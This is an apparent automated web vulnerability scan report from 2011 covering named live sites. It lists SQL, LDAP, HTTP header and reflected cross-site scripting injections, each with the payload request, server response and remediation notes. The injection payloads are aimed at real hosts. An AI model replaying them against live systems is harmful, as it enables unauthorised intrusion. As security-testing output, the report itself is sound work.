Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:21:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>404 Page Not Found</title>
<meta name="description" content="Why are we so dedicated to being a law firm &quot;different in kind&quot; from those you have encountered in the past? Because our goal is to be your trusted partner -- a partner you can rely on to solve your problems and enhance your business." />
<link rel="stylesheet" type="text/css" href="http://www.tuckerellis.com/css/interior.css" />
<link rel="stylesheet" media="print" type="text/css" href="http://www.tuckerellis.com/css/print.css" />
<link rel="shortcut icon" href="http://www.tuckerellis.com/tucker-favicon.ico" />
<script type="text/javascript" src="http://www.tuckerellis.com/javascript/justcorners.js"></script>
<script type="text/javascript" src="http://www.tuckerellis.com/javascript/functions.js"></script>

<script type="text/javascript">
if (document.layers) {var NN4 = true;}

if (document.all) {var IE = true;}

if (document.getElementById && !document.all) {var DOM = true;}

function getElement(id){
   if(NN4) {
       path = document.layers[id]
   } else if(IE) {
       path = document.all[id]
   } else {
       path = document.getElementById(id)
   }
   
   return path;
}
</script>
</head>

<body>

<div id="container">
<a href="http://www.tuckerellis.com/"><img src="http://www.tuckerellis.com/images/logo-sm.gif" border="0" alt="Tucker Ellis &amp; West" name="logo" width="344" height="47" id="logo" title="Tucker Ellis &amp; West" /></a>

<div id="navigation">

<div id="primary">
<script type="text/javascript">

var submenu = 'submenu0';
function NavOff() {
   getElement('submenu1').styl
...[SNIP]...

1.9. http://www.tuckerellis.com/tucker-favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.tuckerellis.com
Path:   /tucker-favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 25991164%20or%201%3d1--%20 and 25991164%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /tucker-favicon.ico?125991164%20or%201%3d1--%20=1 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 12 May 2011 12:21:44 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 304
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /tucker-favicon.ico
on this server.</p>
<hr>
<address>Apache/2.2.3 (CentOS) Server at www.tuckerellis.com Port 80</address>
</body></html>

Request 2

GET /tucker-favicon.ico?125991164%20or%201%3d2--%20=1 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 16 Apr 2009 13:44:14 GMT
ETag: "787a4-57e-42776780"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ....................................j...o...l...........q...........w...j........&..j...........l.......l.......n...w........'..p
......l....O..l...r..h...............w...............p...y.......r...............o........Y...4..c.......m...o...........k....(..m.......o    ......x........Q...,..o
..............q...W..g..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................$('9;;;;;;;;9"C#,1..7
..
7..1.=.@0.80..08.0@.    .A*.2D.++.D2.*A..A6<:.<55<.:<6A..A.<..<..<..<.A..A.<..<..<..<.A..A.<..<..<..<.A..A.<..<..<..<.A..A.< .<..<. <.A....<5.<..<.5<...4.B<>-...2-><..499E%!G.F/)G!B.99=.....9

3.?&.3.,1...;;;;;;..31.$('9;;;;;;;;9"C#................................................................

2. LDAP injection  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://akatracking.esearchvision.com
Path:   /esi/redirect2.html

Issue detail

The esvaid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 8ad6dbc7bbe7c3c8)(sn=* and 8ad6dbc7bbe7c3c8)!(sn=* were each submitted in the esvaid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=8ad6dbc7bbe7c3c8)(sn=*&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA8ad6dbc7bbe7c3c8)(sn=*=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA8ad6dbc7bbe7c3c8)(sn=*=;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34117
Date: Thu, 12 May 2011 11:01:14 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

Request 2

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=8ad6dbc7bbe7c3c8)!(sn=*&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA8ad6dbc7bbe7c3c8)!(sn=*=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA8ad6dbc7bbe7c3c8)!(sn=*=;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34117
Date: Thu, 12 May 2011 11:01:14 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

3. HTTP header injection  previous  next
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/activity [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8e8e3%0d%0a4cbaf4bd3c9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8e8e3%0d%0a4cbaf4bd3c9;src=1170328;type=nytdd463;cat=dealb724;ord=1;num=5983610623516.143? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8e8e3
4cbaf4bd3c9
;src=1170328;type=nytdd463;cat=dealb724;ord=1;num=5983610623516.143:
Date: Thu, 12 May 2011 11:05:21 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://akatracking.esearchvision.com/esi/redirect2.html [esvaid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://akatracking.esearchvision.com
Path:   /esi/redirect2.html

Issue detail

The value of the esvaid request parameter is copied into the Set-Cookie response header. The payload 62e27%0d%0a952543f233d was submitted in the esvaid parameter. This caused a response containing an injected HTTP header.

Request

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=62e27%0d%0a952543f233d&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA62e27
952543f233d
=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11: 01:14 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA62e27
952543f233d=;expires=Fri, 11 May 2012 11: 01:14 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34117
Date: Thu, 12 May 2011 11:01:14 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

3.3. http://akatracking.esearchvision.com/esi/redirect2.html [esvcrea parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://akatracking.esearchvision.com
Path:   /esi/redirect2.html

Issue detail

The value of the esvcrea request parameter is copied into the Set-Cookie response header. The payload 26685%0d%0a292b8d9985f was submitted in the esvcrea parameter. This caused a response containing an injected HTTP header.

Request

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=26685%0d%0a292b8d9985f&esvt=128-MSUSe20937&transferparams=0&esvaid=40007&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA40007=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE26685
292b8d9985f
_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11: 01:14 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA40007=;expires=Fri, 11 May 2012 11:01:14 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34117
Date: Thu, 12 May 2011 11:01:14 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

3.4. http://amch.questionmarket.com/adscgen/sta.php [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload e513e%0d%0a4a7e0968d52 was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=909615&site=312253240&code=e513e%0d%0a4a7e0968d52 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:16:19 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:16:18 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_909615-1-1; expires=Mon, 02-Jul-2012 03:16:19 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-A76)M-0; expires=Mon, 02-Jul-2012 03:16:19 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=atlas&survey_num=909615&site=2-312253240-&code=e513e
4a7e0968d52

Content-Length: 33
Content-Type: text/html

/* /adsc/d909615/2/-1/randm.js */

3.5. http://amch.questionmarket.com/adscgen/sta.php [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 40cbd%0d%0a96c50092903 was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=909615&site=40cbd%0d%0a96c50092903&code=214693346 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:16:14 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:16:13 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_909615-1-1; expires=Mon, 02-Jul-2012 03:16:14 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-576)M-0; expires=Mon, 02-Jul-2012 03:16:14 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=atlas&survey_num=909615&site=-1-40cbd
96c50092903
-&code=214693346
Content-Length: 44
Content-Type: text/html

/* /adsc/d909615/-1/200214693346/randm.js */

4. Cross-site scripting (reflected)  previous  next
There are 191 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://207.56.166.97/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://207.56.166.97
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f79e7"><script>alert(1)</script>1553382093a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof79e7"><script>alert(1)</script>1553382093a HTTP/1.1
Host: 207.56.166.97
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:41:46 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10934

